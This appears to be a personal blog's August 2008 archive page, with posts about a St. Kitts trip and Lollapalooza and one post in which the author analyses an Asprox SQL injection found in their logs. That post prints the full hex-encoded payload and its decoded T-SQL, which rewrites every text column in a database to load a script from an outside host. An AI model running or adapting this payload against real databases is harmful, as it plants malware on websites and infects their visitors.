Archive for August, 2008

St. Kitts highlights

Thursday, August 21st, 2008

A week in St. Kitts and Nevis and an unexpected 1 night stay in Miami let to some great moments. All involved eating and/or drinking. When in St. Kitts I recommend:

  • Guinness Foreign Extra and Carib Lager are plentiful and brewed on the island.
  • A whole perfectly cooked and perfectly split down the center lobster from Mr. X’s Shiggidy Shack. This think was amazing, drenched in butter and garlic.
  • Hiking up the volcano trail to have a modest lunch in the clouds looking down into the crater.
  • The cigar bar at the Marriott.
  • The drunken nights at Monkey Bar hanging out with the bartender looking out over the Caribbean Sea steps away made the trip.

Tags:
Posted in Uncategorized | No Comments »

Hex value sql injection attack.

Monday, August 4th, 2008

I just found some errors that looked a little strange. It was obviously a sql injection attack but I couldn’t tell what it was. After the normal parameters I found this:

;DECLARE @S VARCHAR(4000);SET
@S=CAST(0×4445434C41524520405420564152434841522832
3535292C4043205641524348415228323
53529204445434C415245205461626C655F437572736F7
220435552534F5220464F522053454C4543
5420612E6E616D652C622E6E616D652046524F4D2073
79736F626A6563747320612C737973636F6C75
6D6E73206220574845524520612E69643D622E696
420414E4420612E78747970653D27752720414E
442028622E78747970653D3939204F5220622E787
47970653D3335204F5220622E78747970653D323
331204F5220622E78747970653D31363729204F5
0454E205461626C655F437572736F72204645544
348204E4558542046524F4D205461626C655F437
572736F7220494E544F2040542C4043205748494
C4528404046455443485F5354415455533D30292
0424547494E20455845432827555044415445205
B272B40542B275D20534554205B272B40432B275
D3D525452494D28434F4E5645525428564152434
841522834303030292C5B272B40432B275D29292
B27273C736372697074207372633D687474703A2
F2F7777772E6E6362772E72752F6A732E6A733E3C
2F7363726970743E27272729204645544348204E4
558542046524F4D205461626C655F437572736F7
220494E544F2040542C404320454E4420434C4F53
45205461626C655F4 37572736F72204445414C4C
4F43415445205461626C655F437572736F7220
AS VARCHAR(4000));EXEC(@S);

With a little help from:
http://isc.sans.org/diary.html?storyid=4565 and  http://www.eggheadcafe.com/software/aspnet/32646085/sql-injection-gibberish.aspx

I leanred that was hex code that translated to:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype=’u’
AND (b.xtype=99 OR b.xtype=35
OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN EXEC(’UPDATE [’+@T+’] SET [’+@C+’]=RTRIM(CONVERT(VARCHAR(4000),[’+@C+’]))+”<script src=”http://wwwDOTncbwDOTru/jsDOTjs”></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_Cursor

More and better info found http://www.dynamoo.com/blog/labels/SQL%20Injection.html

This is called Asprox

Tags:
Posted in code | No Comments »

Rage Against Unsafe Festival Behavior

Monday, August 4th, 2008

Lollapalooza 08 was great. 3 days of Paulina Meatmarket brats and Inbev beers. Complaining would be dumb because I had a great time but I thought I would post a few observations.

Why did Goose Island bother? Because, when I think Goose Island, I think fish tacos….What?!? No beer at the Goose Island tent? And if we go to the specialty beer tent they only have 312? No Honkers at all?

There is nothing like seeing young pretty well adjusted girls screaming “I hurt myself today. To see if I still feel…”

I wasn’t expecting RATM to be the band stopping the show to make sure the crowd behaves. I couldn’t tell you how many of the people there than night were casual fans; but, during the last song, Killing in the name of, every single person seemed to know one part. “Fuck you I won’t do what you tell me!” And the crowd put all that audio equipment to shame. They were quite to begin with. When the crowd erupted there was no way to tell if the band was even playing anymore.

Obama didn’t show up. If he had, I would have missed him anyway. I’d rather see NIN.

If the bio says the band is from Texas by way of New Hampshire, they are not from Texas.

Posted in Uncategorized | No Comments »